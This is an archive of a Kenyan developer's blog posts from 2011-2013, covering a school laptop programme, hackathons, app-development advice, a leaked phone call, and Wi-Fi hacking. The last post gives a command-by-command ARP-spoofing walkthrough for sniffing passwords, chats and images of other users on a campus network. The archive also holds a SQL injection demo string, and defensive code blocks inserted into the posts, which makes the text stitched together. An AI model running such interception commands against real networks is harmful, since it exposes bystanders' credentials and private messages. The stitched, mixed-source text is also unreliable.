
Category Archives: true stories

Uhuru Kenyatta’s Free Laptop Programme: a techie's perspective

So yesterday (16th April 2013) I watched as the President reiterated that the free laptop programme he promised is still on. To be precise, this is what he had to say: “6:09 pm Uhuru: My government will deliver on its promise of free laptops for our children starting next year. Our vision is to have laptops availed in future to be assembled locally”. Two things struck me: his timeline (next year) and his ambition to have them locally assembled in future. But before I look into either of his points, let me first shed some light on one already existing laptops-for-primary-schools program.

In Rwanda the supplier was One Laptop Per Child (OLPC), an American charity linked to MIT, but this process was plagued with controversy. I will only highlight the techie bits and stay clear of any politics here. The first controversy was when Intel opted out of the program, meaning these computers were to run on another chipset. The second, and the one I was very keen on, was the operating system the machines were running on: the war raged between open source and Windows XP. Despite this, the computers were indeed supplied later on; the computer was dubbed the XO laptop, and Rwanda got 120,000 units, Ghana 10,000 and Sierra Leone 5,000. Read more here>>>

Now coming back to Kenya and looking back at what the President said. The first point was the timeline. The government should indeed not deploy these computers in any rush. I would suggest a whole year before they are made available to any classroom. The reason? Well, let's face it, the majority of teachers who will end up using these devices to administer learning to kids have limited computer training. I can imagine the scenario if a teacher in, say, Nyeri or Siaya just got handed a bunch of devices and was told to use them in teaching; it would be no easy feat. Second, the actual devices themselves: if we do choose to issue laptops, what operating system will they run on?

There are only two options here: Windows or an open-source platform, e.g. Linux. Revisiting OLPC, the dispute was between exclusive use of open-source software for the project and suggestions in favor of adding Windows XP, which Microsoft was in the process of porting over to the XO hardware. Microsoft’s Windows XP, however, was not seen by some as a sustainable operating system. Microsoft announced on May 16, 2008, that they had let them have Windows XP for $3 per computer. It would be offered as an option on XO-1 laptops and possibly be able to dual boot alongside Linux. However, no significant deployments elected to purchase Windows licenses.

Assume these laptops are indeed to run on Windows at $3 per Windows licence, and assume the first phase sees 500,000 issued. That would mean Microsoft would charge $1,500,000 (120,000,000 KSH). And since the government aspires to buy 5.86 million computers for kids, that would translate to approximately $17,600,000 (1.4 Billion KSH) just for the OS. The other scenario would be to use a free variant of Linux and do away with this cost. And assuming that the computers are not going to run on an Intel-based chipset (to reduce cost per unit), then for the performance to be optimal Linux would make more sense. Then, going ahead and looking at his suggestion that the computers get manufactured locally, it would mean we buy the parts from a cheap source, e.g. China, ship them to Kenya, assemble them on an alternate chipset with a Linux variant and hand them over to the kids.

But the West would fight this with all their might, not because they are losing out on $17,600,000, that’s pocket change, but because of a simple mathematical term called extrapolation. If a kid grows up using Linux from class 1, what are the odds that when he/she turns 20 and wants to buy their own computer they will choose Microsoft? This will mean that little by little Microsoft will fade out of Kenya, as the OS of choice would be Linux. Asia is a living example of this: kids grew up using Linux, and Microsoft is not as big there as it was back in the day. Intel would also lose a large market presence in the country. So if Uhuru were to opt for this, he would in turn be giving the West a big middle finger. But there would be the issue of Internet connection on these laptops.

The other option would be to provide a solar-powered tablet instead of a laptop. A simple Android-based, Kenyan-assembled tablet would cost around $30 and would represent the least expensive solution for bringing computing and, more importantly, internet connectivity to students in Kenya. Tablets of this kind can access data networks using GPRS where 3G or 3.75G is unavailable. With the app bubble at its peak, devs would have a field day driving local online and offline content for these devices. Data providers, e.g. Safaricom, Zain, Orange and YU, would see data revenues go up, also translating to more revenue for KRA to take home, and job creation.

 

Posted by on April 17, 2013 in 254, code, JKUAT, kenyan clones, legal issues, true stories

 


Guest Post: THE TROUBLE WITH HACKATHONS NOWADAYS

It's been a while since I had a guest post on my blog. So when a pal asked whether I could let her do one, you know a brother had to say yes. So here it is {she blogs here if you are curious >>>>}

THE TROUBLE WITH HACKATHONS NOWADAYS

Been meaning to write this for a while and finally here goes. OK, I'm not against competitions, but seriously, we need to rethink why and how we have these.

I like campus people, that's not the issue, but most of the time when you go for these things you will find the majority of them there. It's not that the other guys don't want money, but people are too grown for these (as in, guys don’t go for competitions just for the sake of it; people are busy coding “for sustenance”, not for weekend money. But if the money is big, fine). Most of the time you will get those who are on holidays, those who just cleared from school and have come to socialize, and others who just love the experience. There are those who go to make an extra buck and don’t think beyond the hackathon, then there is a fourth type of guys who have gone there with an intention of meeting the local tech scene (if the big names show up), putting what they know to the test (because they actually have the initiative to teach themselves real code) and learning from the experienced people (they know there are guys better than them), so as to perhaps create networks for side-hustle jobs to build their skills.

Now we all know that on campus, unless you own a business or you are a hustler, you are usually broke, so the sound of getting Ksh. Xk in a day sounds very exciting. Now it won’t matter if you actually have any skills or you are willing to do your best to add value to the team; getting the money is the focus for you, since the mere fact of being in a team, even if you didn't do anything, assures you a cut. Then lastly there are those who call themselves gurus and think they know everything... wololos!

Now this bunch (know-it-alls and joyriders) is what is giving competitions a bad name. Man, you go to a hackathon and you meet people who just want the money and don’t even want to work for it. As in, there is a difference between a commercial product and a class assignment, and what they want to give is classroom material. When our university students go abroad for internships and the like, if they are doing CS (Computer Science or related stuff) they usually notice the difference. I guess it’s the fact that they realize many people are used to doing a shoddy job in class, as in “as long as I get the marks”. Meanwhile, as we write Hello World in all languages, there is a kid who has published several apps for iOS... OK, moving on.

I think the standards at hackathons should be raised, as in, if you tell every Tom, Dick and Harry to attend, there are guys who, even for their own good, don’t learn anything from there since they give minimal or no input. Then it has been noted (relax, the statistics have not been released yet) that most startups formed by strangers at hackathons, especially students who don't know each other, or any other group, don’t last beyond that. Only people who know each other well or have worked together and know what everyone else brings to the table have been successful.

Don’t get me wrong, there are many gifted students, shout out to UON, Strath, JKUAT, Egerton, Baraton, KEMU and the other Kenyan campuses, but seriously, sometimes... OK, that's all!

 
 


Similarity between Prostitution and Coding/Programming in Kenya

I wrote the title to this post and couldn’t help but laugh at first. I mean, I have written some really weird posts, but dude, this one just has to be the one. Anyway, let me state my case: the similarity between prostitution and coding/programming in Kenya.

Let me begin with a shallow, albeit obscure, definition of both. Prostitution is the act of selling one’s body in a sexual way for profit. It’s one of the oldest professions around. Coding is the development of software products that solve problems related to day-to-day activities. This is usually done for profit {or not}, but let’s just stick with the profit aspect in this context. So how are the two similar, you may ask? Well, I have been watching episodes of Hung back to back and the thought crossed my mind: my God, prostitution and coding are similar. Hung is a series about some boy toy who has to screw women for money simply for survival, but soon ends up doing it for the money. Here is a link >>>> Let me paint a picture of the similarity between the above two professions.

In the world of business the key to making major mullah is some form of advertising. It doesn’t matter if it's false advertising or true advertising; the more you or the product are known, the more likely you are to get many customers and hence more mullah for you. Capisce? The same applies to hookers. It doesn’t matter how pretty a hooker is: if you don’t have a connect then you don’t get mullah, or you will really have to put in work in order to get barely any customers. And don’t forget you may get a customer who refuses to pay once the job is done, simply because you are minus a pimp to chase them down. Still with me? OK, let's continue. Right, in this world if you don’t have connects and end up on someone's street then, bitch, you gon get your ass kicked.

The converse is also true. You may not be a fly-looking mama, but based on how good your pimp is you end up getting major mullah, all the while the fly-looking girl on the corner is still waiting at around 3am for her first customer, or dodging the cops (Kanjo), and if the day is bad she will leave with barely anything in her pocket (or bra!!). So the key to a hooker getting paid is the pimp. And of course location, location, location.

Right, let's go to coding. A key aspect of coding in Kenya is making money (wait, before you start yelling, I know some coders are in it purely for the dev aspect, money ain't an issue; that being said, let's go ahead). First there are coders who are just great, so great that they are like the fly hooker who just walks down the street and gets a pick-up from some rich guy. Zero effort on her side, she just swings her hips, flaunts the goods and voilà, the deal is sealed. The goods advertise themselves; they are few though, countable really. These types of coders are the ones who have done really huge projects, and their name searches on Google yield impressive results. Cash is impressive also; actually the pay is more than impressive. Major $$$$, ka-ching ching.

The second type of coders are the ones with a super pimp. A pimp who will hook them up with serious jobs, USD projects. They know Mr. X in this blue-chip firm, Mr. Y in that other firm; I mean, they are more wired than the extension cable in my house. These types of coders are the ones who get calls like “Hey man, BBK wants such-and-such a system, and they are willing to pay 5000USD if you can deliver it in 1 month”. They push two 4-figure USD projects in a month. And have egos the size of Thika Road.

Then there is the third type, good coders who have no pimps. These guys have to remain on the corner the whole night and hope the makeup they spent their last dime on will get them a client. These coders end up with 4 or 5 small jobs, all barely 20K each, all on a tight schedule. 2-5 day deadlines for a 10K gig; the desperation of waiting on the curb makes them concede. If they are unlucky, then even the 20K they were to get paid ends up being stolen from them (just like the hooker without a pimp).

Then there is the fourth type: the ones who don’t even know where the curb is. Those are like the pretty hookers who believe that since they are pretty they will end up making mullah, but soon find out that life without a pimp is hard to get through. They end up being facked (for free!!), all the while being lied to that they will be given a great job. Doesn’t matter if you can code in binary or even in some unknown scripting language. If no one knows you, then the most you will get is a lay from your chick (the pity kind... nothing kinky or spicy).

That being said, if you are a Kenyan coder, then slot yourself accordingly. Let me go and find a pimp.

 

Posted by on October 29, 2012 in 254, code, kenyan clones, true stories, twitter, weekend

 


TO KENYAN MOBILE DEVELOPERS #Advice

I have noticed this phenomenon with many Kenyan techies/wannabe techies/copy-pasting techies/code-stealing techies: every one of them has this app idea they are working on, this awesome idea that will earn them a couple of million like @jmwai or the likes of Mbugua Njihia and Steve Mutinda. So you will most of the time find them at iHub, over in the green members' area, with their Eclipse fired up, writing/copying/downloading code to build up their apps. “So, Jaymo, what's wrong with that?” Nothing really, I am OK with that; at least they are putting in work code-wise, they are helping build that Konza City dream/mirage. What really pisses me off is: do most of them sit down to think about what they are coding before they actually do? Do they analyze the current market and study it well? As Dr. Okello, my Calculus 3 teacher, would have said, do they account for variable change? Do they have a target demographic for their M-something solution? Maybe, maybe not!

Back in undergraduate, while doing Mathematics and Computer Science at JKUAT, we were taught the stages of software design and implementation, the logical flow in developing software. But this is how these guys are doing it nowadays:

Techies come up with brilliant ideas on their own, and often they have not carried out any form of research to find out who their user is, what their user needs, and what would then be an appropriate solution to meet this need.

Techies barely leave their desks when coding, or before they begin coding. What you have is brilliant techies with fantastical ideas that no one uses [after they’ve been developed] because the time was not taken to really understand what issues citizens face.

As if that’s not enough, most of the apps put out are poorly done in all aspects, starting from design. This new breed of techies fails to understand that the design of an app’s interface begins on a sketchpad and not in the IDE!! Ask @martianskills of Skyline Designs and he will concur. When it comes to design, what is the current norm with these techies? The old-school dashboard layout. This design was launched at Google I/O 2010. 2010!! My friend, 2010! But that’s what every one of them is working with. Then you fail to develop proper icons on top of that, and you get a cheap-looking app. Aesthetics, my friend, go a long way. You just look at this interface below and tell me what you think... just plain ugly!!!

Now that you have seen a bad one, let me show you one by @zacckOS and you will see what a mature interface looks like

and a snapshot from TafutaID:

Secondly: you have your interface, so now you are working on functionality. You heard that JSON is what gets used and you are all in. You have hit Google search and found some code, you slap it all together and voilà, functionality achieved. You have no shame at all!! Half of these app developers are just some guys with a little Java knowledge, a little PHP, even less C knowledge and barely any Python at all. You are writing server-side code that is wide open to exploitation, on databases you have propped up with even more shifty coding. I mean, SQL injection is so freaking easy even my 5-year-old niece could hack it!! Login forms that do not sanitize user input... passwords stored in the DB in plaintext! Or, if they are protected at all, they are all MD5-hashed without even a salt... how?? Why!!
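The two server-side mistakes named above, side by side with their fixes, as an added example that is not code from this post. The table layout, user names and passwords are constructed for the demonstration, and PBKDF2 stands in for whichever slow, salted password hash you prefer.

```python
import hashlib
import hmac
import os
import sqlite3
from typing import Optional

PBKDF2_ROUNDS = 200_000  # assumption: tune to your own hardware


def md5_unsalted(password: str) -> str:
    """The weak scheme: fast, and identical passwords give identical digests."""
    return hashlib.md5(password.encode()).hexdigest()


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Salted, deliberately slow hash, stored as 'salt$digest' in hex."""
    salt = salt or os.urandom(16)  # fresh random salt per user
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return f"{salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    salt_hex, digest_hex = stored.split("$")
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), PBKDF2_ROUNDS
    )
    # Constant-time comparison of the recomputed digest with the stored one.
    return hmac.compare_digest(candidate.hex(), digest_hex)


def make_db() -> sqlite3.Connection:
    """In-memory table holding both schemes for the same constructed users."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT PRIMARY KEY, md5 TEXT, pw TEXT)")
    for name, password in [("alice", "kenya2012"), ("bob", "kenya2012")]:
        db.execute(
            "INSERT INTO users VALUES (?, ?, ?)",
            (name, md5_unsalted(password), hash_password(password)),
        )
    return db


def login_vulnerable(db: sqlite3.Connection, name: str, password: str) -> bool:
    # User input is pasted into the SQL text, so a quote in `name` changes
    # the statement itself instead of being treated as data.
    query = (
        "SELECT name FROM users WHERE name = '" + name
        + "' AND md5 = '" + md5_unsalted(password) + "'"
    )
    return db.execute(query).fetchone() is not None


def login_hardened(db: sqlite3.Connection, name: str, password: str) -> bool:
    # Bound parameter: the driver passes `name` as a value, never as SQL.
    row = db.execute("SELECT pw FROM users WHERE name = ?", (name,)).fetchone()
    return row is not None and verify_password(password, row[0])


if __name__ == "__main__":
    db = make_db()
    crafted = "alice' --"  # classic comment-out of the password check
    print("vulnerable login accepts crafted name:", login_vulnerable(db, crafted, "x"))
    print("hardened login accepts crafted name:  ", login_hardened(db, crafted, "x"))
    rows = dict((n, (m, p)) for n, m, p in db.execute("SELECT * FROM users"))
    print("same MD5 for same password:", rows["alice"][0] == rows["bob"][0])
    print("same salted hash:          ", rows["alice"][1] == rows["bob"][1])
```

With unsalted MD5, the two users who share a password share a digest, so one cracked or looked-up value exposes both; the per-user salt removes that.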

Third: Everyone assumes it's easy. It's like, these days if you don't have an app you are not cool; if you haven't submitted an entry you are toast! So everyone has an app. That is freaking great, but hold on a minute! Does this breed of devs even watch trends at all? Flash back a bit and let me use my own example. Based on Google I/O 2010 I developed KwaRamani, using title bars, dashboard layouts and themes. Based on Google I/O 2011 I developed TafutaID, with support for storing data in the cloud and pulling responses back with C2DM. In 2012, working with Google Drive. But these techies build you a Flintstones app based on '90s technology, and then in the lift you hear guys saying, “Aaah, Android is easy... something as simple as JSON encoding and HTTP is what people find hard?” OK, brother, keep on writing 1999 software in the 21st century.

Fourth: Market. OK, the app is done; finally all those hours of coding have amalgamated into something. You have even shown your ex the app and now she wants you back, because you look like you have a bright future ahead! Yes, you have that smirk! The Kanye West kind: “…wait till I get my money right…” But wait a minute, none of your apps are on the market!! I am not a well-established techie, so I can relate to most of these techies not having the $25USD to set up the Android Market account, or if you have it, it's in KSH and you don't have a VISA card to pay for the account. So you can't get it to the market, so the app stays on your computer, and two months later your ex/baby mama is looking at you like, “Nyga, please.” That’s where people fail. There are many ways to get it out to the masses. Samsung Store is free to upload to, and good old GetJar is still around. Remember, before Android, iOS and the likes of Symbian S40 came, when Moi was still president and J2ME was the only way, GetJar and Waptrick were the ishh, and they still work, so you can upload there. Watch the trends and bit by bit you will learn/earn and upload to Android Market.

Fifth: No man is an island. As cliché as that may sound, it's true, and when it comes to code no developer is an island either. Ask for help when you get stuck, and offer help when you are asked too. Don’t be one of those guys who hide their answers in an exam so that people can't copy (I can think of a couple from my JKUAT days). Build a network, and not only on the iHub couch. Try to enter competitions not for the prize money but more for the exposure you will get and the people you will meet.

PARTING SHOT

Those are just my views, based on what I have observed. Moving along swiftly: last week I was privileged enough to have a long talk with Dele Akinsade, Microsoft Director, Developer Platforms, West, East & Central Africa and Indian Ocean Islands. We talked about Windows Phone development, and I argued with him that Microsoft has not done enough for techies who want to develop on the platform, from the SDK itself to lowering the price of phones running on this platform to allow penetration into the market. He told me affordable feature phones will be launched sometime this year, running not Windows Phone 8 but 7.5. Plus the Windows Phone 8 SDK is out and offers a lot to developers. So if you are a techie you can try to start developing on this platform before the phones arrive and have a niche before the rest.

 

Posted by on June 29, 2012 in 254, code, hack, Humour, true stories

 

Listen up all ye non-coding believers.

OK fine, this year doesn't look bad, code-wise actually. It's not that I'm saying I haven’t gotten any runtime errors or fatal warnings; in fact, just yesterday I had some crazy buffer overflows. But just generally, I feel my coding has kind of matured. Let me paint a picture for you. In first year, while doing Calculus 2, I had this lecturer who was quite unorthodox. After he had finished teaching all 5 methods of integration he introduced a 6th one: integration by looking at. This is what he said: in math there comes a time when you just look at a function and figure out how it's integrated. This seemed quite the academic feat for my then young mind, but a couple of Calculus and ODE lessons later I had gained the mastery, the mastery to stand up to something like PDE and not fall into fits of shock.

Back to the present. Well, code is no different from that integration class of mine. Once upon a time you are doing hello world code, then taking baby steps to understand how the core functions work, till you get to a place where you have amassed code skills and a library that you have created, that you understand and that you apply often in your coding endeavours. You reach a place where you look at code and know what's happening, how to optimize it to reduce consumption of vital resources and, most importantly, how an exploit would be carried out if the need ever arose and how to prevent said exploit.

Then you grow a network of people who think, talk and pretty much have an obsession for code like you. Anonymous and LulzSec did IRC, but we mere mortals just hang out on Twitter or at the iHub, or at whatever place has a good Wi-Fi connection, and just kick it. People start associating you with certain terms: just as you would identify a guy like Alykhan Satchu with IPO, people now identify you with PHP, JSP, Java... that kind of thing.

Your little blog is now getting something like 320 hits a day, with readers showing interest here and there, and you are also being followed by a sizable number of people on Twitter. At least people get you... till one day someone has the BALLS to ask a dumb question like “Jaymo, if you are so good at Android, why didn't you win Afrinolly last year in the Google challenge, why didn't you win MsemaKweli last year at App Circus…” The same guy goes on to rant, “…what do you have to show for all that code talk?”

Well, that is when the Merian blood in me starts boiling up, and I may decide to go all wordy on you and probably give you a bit of tongue whoop-ass. But to what avail? To have you read it back from whatever location you are in and be like, “Didn't I tell you…” Hell no, Jaymo is bigger than that.

I have great mentors in my coding life, mentors who will tell you that as soon as you make that prize money, head to the coast and do tequila on the white sand, you will be digging a coding grave for yourself, because some kid will be on his HP coding while you are sucking titties in Lambada. Is that the reason why I don't do coding competitions? Well, not exactly. I'd rather do a whole week of coding for a client, present excellent workmanship after it's all said and done, watch the client gape in amazement (that look of gratitude on his face is orgasmic), then walk away with, say, X amount, knowing that the client will most likely give me a referral to someone else and someone else, and slowly Jaymo will get his dough, than just win a competition and get the media and online coverage that will make you think you have arrived, get relaxed, slowly get lazy, and then in the end fall out.

Personally I'd rather put in work on an idea I feel will earn me long-term mulla than short-term fame, a project that will change and impact the lives of people rather than an app that will probably not even make it to the mainstream market. Kenya is currently ripe. The government has started doing its work, Bitange Ndemo is doing his thing, and even a certain telco has stopped being difficult and is allowing coders to do their thing; ask Iddsalim.

What I am trying to say is I've got my thing going on. I don’t wake up in the morning and start typing lines of code for nothing. I'm looking for money, my friend, and the best way I know how is the one I am currently doing. So coding fests in 2012 are a huge NO, but if you hear of a client who needs coding work, holla at your boy.

 

 

Posted by on January 18, 2012 in code, JKUAT, Reflections, true stories, twitter

 


Muturi & Nicole Booty call.

I am not going to say much about that call; rather, I will just re-blog what IddSalim wrote on his blog about the possible source of the audio leak. So here is a snippet of what he had to say:

“………………The question the few Kenyans with a brain are asking is this. “How did they listen in on that call?”. The question the few coders/security analysts are asking is this. “Has phone-call interception equipment finally come to Kenya? Do we, FINALLY, have hackers who can do what Salim has been talking about, and got insulted for? Are our worst fears finally here? Should we be worried?”. So, I decided to demystify the source of the clip…………

I tried looking at the audio file in MP3 using the Nyquist-Shannon sampling theorem and other audio analysis models and the results were outstanding. The recording came out as a perfectly flowing person-to-person convo. The convo took place and could not have been cooked. And so, I came up with these scenarios.

1 – A telco employee did it

As stated above, it is POSSIBLE and IT HAPPENS that phone call and SMS records can be sold. The question becomes, how come it was ONLY this call that got out. How idle would a telco employee be, to sift through ALL the GBs of data to get this ONE call? Still, idlers exist. And there is something called luck.

2 – Muturi did it

Using a Smart or Smart-Enuff phone, one can record a phone call. Muturi might have recorded the call (knowingly or just automatically), found it funny as f*u*ck, and decided to share. Nicole would not have shared this. Stupid female pride would not have let her. Muturi would. Stupid male ego would not let him not share. “See how the girls fall for me”.

3 – It was a studio-born viral prank call

High probability too. A ‘real’ phone call can be, unfortunately, manufactured. At the last few seconds of the call, we hear the credit/airtime beep. If a studio call, then this is a specially crafted section to add to LEGITIMACY. Stupid Kenyans must have been heard saying: “You even heard the credit running out. It's real.” How would someone willing to pay for a cab and cook meat not have more than KSHS 16.8 of credit?………….”

You can read his whole thought train here >>>> Or you can click here>>>> to listen to it

 

In my personal opinion, and speaking as a guy, I think Muturi must have recorded it on his phone. You don't even need a smartphone to do that; even an idiot can pull that one off. Then, to prove a point to his boys/pub mates/ex-clandes, he leaked it and waited for it to go viral, and judging by how desperate Nicole sounded, Muturi must have tapped that and moved along.

 


Hacking JKUAT's Wi-Fi.

I get scared at times, not of cliché things like the dark or being shot by the cops because I come from one of those neighborhoods. What scares me most is cyber attack. This is going to be a tech post, so if you are not into that kind of thing please click here>>>>

That being said, let me dive head first into the contents. I am a Wi-Fi junkie. I spend more time online than I do with my girlfriend, and Wi-Fi has been good to me (when it's not that time of the month when it gets all hormonal). So why am I afraid???

Well, let's just take it from the top. I share an access point with some 100 or so guys at peak and 4-5 at off-peak. The commonest sites visited are Facebook, YouTube and probably Yahoo (I didn’t mention Google because it goes without saying). Peak time is usually from 7-10pm and off-peak ranges from there. The Wi-Fi network is protected with a WPA2 security pass and AES encryption (not TKIP). The network is behind a proxy server that runs Squid, and what do we all know about Squid??? Squid sucks at HTTPS (I'd rather go for an ISA server, but then again I am not JKUAT, I only go to school there).

So, Jaymo, now that you have told us all this, how does an attack occur? First, this is purely for educational purposes. One of the easiest attacks uses a little-known tool called Firesheep. OK, Firesheep is fa***** easy to use, primarily because it's not stand-alone software but rather a Firefox add-on. With this nifty add-on you can do a ton of things to rookie web users. Wanna hear like what?

Suppose Student X logs on to an access point, say the RUNDA wireless connection. The DHCP server awards him a renewable 1-hour lease on an IP (all without him knowing) and he establishes an Internet connection. He has just come from chatting with this first-year chick who gave him her Facebook handle, so Student X wants to snoop. He launches his Mozilla and types the URL, seconds later the login page appears, he logs in and continues doing his thing. Pretty standard, right???? Well, across the yard Hacker X launches his Firesheep and begins this hack. He notices Student X is logged on to Facebook via HTTP instead of HTTPS and decides to steal his session. He does a little of this and that, and minutes later he has the exact Facebook session as Student X. While he is at it he even decides to go through this nyga's inbox to see if he is still dating that gorgeous chick of his. If that's not scary enough, he goes to Facebook settings, changes the backend email address and Facebook password, logs out and kicks Student X out of his own fa**** Facebook page... awesome.

How is this being done? Session hijacking. What all Wi-Fi networks have in common is that people will access them to browse (duh), and when they do, someone can easily steal unencrypted session cookies. Session hijacking is the exploitation of a valid computer session (sometimes also called a session key) to gain unauthorized access to information or services in a computer system. In particular, it is used to refer to the theft of a magic cookie used to authenticate a user to a remote server (SQUID in my case).
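From the site operator's side, the condition that makes the cookie theft above possible can be checked in the response headers. The following is an added example, not part of the original post; the host name, cookie names and header sets are constructed, and the HttpOnly and Strict-Transport-Security checks go a step beyond the HTTP-versus-HTTPS point made above.

```python
def parse_set_cookie(value):
    """Split one Set-Cookie value into (cookie name, set of lowercase attributes)."""
    parts = [p.strip() for p in value.split(";") if p.strip()]
    name = parts[0].split("=", 1)[0]
    attrs = {p.split("=", 1)[0].lower() for p in parts[1:]}
    return name, attrs


def audit_response(url, headers, session_cookie_names):
    """Return findings that leave a session cookie readable on a shared network.

    url     -- URL the response came from (scheme decides plaintext vs TLS)
    headers -- list of (name, value) pairs, duplicates allowed
    """
    findings = []
    https = url.lower().startswith("https://")
    header_names = {name.lower() for name, _ in headers}
    for name, value in headers:
        if name.lower() != "set-cookie":
            continue
        cookie, attrs = parse_set_cookie(value)
        if cookie not in session_cookie_names:
            continue  # preference cookies etc. are not authentication tokens
        if not https:
            findings.append(f"{cookie}: issued over plain HTTP")
        if "secure" not in attrs:
            # Without Secure the browser also attaches the cookie to http://
            # requests, which is where a passive listener on the Wi-Fi sees it.
            findings.append(f"{cookie}: no Secure attribute")
        if "httponly" not in attrs:
            findings.append(f"{cookie}: no HttpOnly attribute")
    if https and "strict-transport-security" not in header_names:
        # Without HSTS a first request can still go out over http://.
        findings.append("response: no Strict-Transport-Security header")
    return findings


# Constructed sample responses (not captured traffic).
WEAK = ("http://social.example/login", [
    ("Content-Type", "text/html"),
    ("Set-Cookie", "sessionid=c29tZQ; Path=/"),
    ("Set-Cookie", "theme=dark; Path=/"),
])
HARDENED = ("https://social.example/login", [
    ("Strict-Transport-Security", "max-age=31536000; includeSubDomains"),
    ("Set-Cookie", "sessionid=c29tZQ; Path=/; Secure; HttpOnly; SameSite=Lax"),
])

if __name__ == "__main__":
    for url, headers in (WEAK, HARDENED):
        print(url, audit_response(url, headers, {"sessionid"}) or "OK")
```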

That's one. Next: the bucket-brigade attack, a.k.a. the man-in-the-middle attack. This is what good old Wikipedia has to say about the bucket-brigade attack. This is an attack where the attacker makes independent connections with the victims and relays messages between them, making them believe that they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker. The attacker must be able to intercept all messages going between the two victims and inject new ones, which is straightforward in many circumstances (for example, an attacker within reception range of an unencrypted Wi-Fi wireless access point can insert himself as a man-in-the-middle).

And since I am in a good mood today, I am going to give you a proof of concept that I actually tried out. First, I am usually working on a Linux distro called BackTrack (sorry Windows slaves, Windows can't hack... f*** what you see in the movies).

So open up a shell and get the tools you want. Primarily we are going to be doing arpspoof poisoning, so we need to get driftnet and dsniff.

So in bash run: sudo apt-get install driftnet dsniff. Next we enable packet forwarding: echo 1 > /proc/sys/net/ipv4/ip_forward, then cat /proc/sys/net/ipv4/ip_forward. This is to allow the traffic on the network to flow via your machine. Then we begin the arpspoof poisoning.

sudo arpspoof -t <your ip> <router ip>, then split your screen and do the reverse: sudo arpspoof -t <router ip> <your ip>. And that’s it, you are primarily the man in the middle here. Now you can have fun with this attack…

An easy one is:

msgsnarf -i eth0, where eth0 is the name of the network interface. You can listen to all the instant message services running, I am talking MSN, Gtalk... any instant messenger. So you can watch someone chatting.

urlsnarf -i eth0 listens to ports 8080, 80 and 3128; if you are in JKUAT and you use Wi-Fi then you must know what port 3128 is. This one obviously listens to URLs that are being sent.

If you are interested in passwords then we can go back to dsniff and do that:

sudo dsniff -i eth0, this will listen to any password being sent.

Now if you want to see what Student X is viewing online, like pictures and such, then we switch back to driftnet:

sudo driftnet -i eth0, this will give you a visualization of activity on the network.

That's it, that's why I get afraid... but no biggie. In my next post I will tell you how to protect yourself from any of the above attacks. Let me go and study for my fluid mechanics CAT.
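On the detection side, ARP poisoning of the kind described above leaves a trace in each victim's neighbour table: the gateway's IP starts resolving to the same MAC as some other host. The check below reads text in the Linux /proc/net/arp layout; it is an added example, not code from this post, and the addresses, the interface name and the baseline gateway MAC are constructed.

```python
from collections import defaultdict

ATF_COM = 0x2  # flag bit for a completed (resolved) ARP entry on Linux

# Constructed tables in /proc/net/arp layout (not real captures).
SAMPLE_CLEAN = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.1.1      0x1         0x2         02:00:00:aa:00:01     *        wlan0
192.168.1.23     0x1         0x2         02:00:00:aa:00:17     *        wlan0
192.168.1.66     0x1         0x2         02:00:00:aa:00:66     *        wlan0
"""
SAMPLE_POISONED = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.1.1      0x1         0x2         02:00:00:aa:00:66     *        wlan0
192.168.1.23     0x1         0x2         02:00:00:aa:00:17     *        wlan0
192.168.1.66     0x1         0x2         02:00:00:aa:00:66     *        wlan0
192.168.1.80     0x1         0x0         00:00:00:00:00:00     *        wlan0
"""


def parse_arp_table(text):
    """Return {ip: mac} for resolved entries, skipping the header line."""
    entries = {}
    for line in text.splitlines()[1:]:
        fields = line.split()
        if len(fields) < 6:
            continue
        ip, _hw_type, flags, mac = fields[0], fields[1], fields[2], fields[3]
        if int(flags, 16) & ATF_COM == 0:
            continue  # incomplete entry, MAC is all zeros
        entries[ip] = mac.lower()
    return entries


def detect_arp_anomalies(text, gateway_ip, baseline_gateway_mac=None):
    """Return a list of (kind, mac, ips) findings for one table snapshot."""
    entries = parse_arp_table(text)
    findings = []

    # One MAC answering for several IPs: the relay host appears both under
    # its own address and under the address it is impersonating.
    ips_by_mac = defaultdict(list)
    for ip, mac in entries.items():
        ips_by_mac[mac].append(ip)
    for mac, ips in sorted(ips_by_mac.items()):
        if len(ips) > 1:
            findings.append(("duplicate-mac", mac, sorted(ips)))

    # Gateway no longer resolves to the MAC recorded when the network was
    # known to be healthy.
    current = entries.get(gateway_ip)
    if baseline_gateway_mac and current and current != baseline_gateway_mac.lower():
        findings.append(("gateway-mac-changed", current, [gateway_ip]))
    return findings


if __name__ == "__main__":
    for label, table in (("clean", SAMPLE_CLEAN), ("poisoned", SAMPLE_POISONED)):
        print(label, detect_arp_anomalies(table, "192.168.1.1", "02:00:00:aa:00:01"))
```

A duplicate MAC is a signal to investigate rather than proof, since routers with several addresses and proxy ARP produce it legitimately; the gateway-baseline mismatch is the stronger indicator.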

 

Posted by on September 28, 2011 in hack, INTERNSHIP, JKUAT, true stories

 
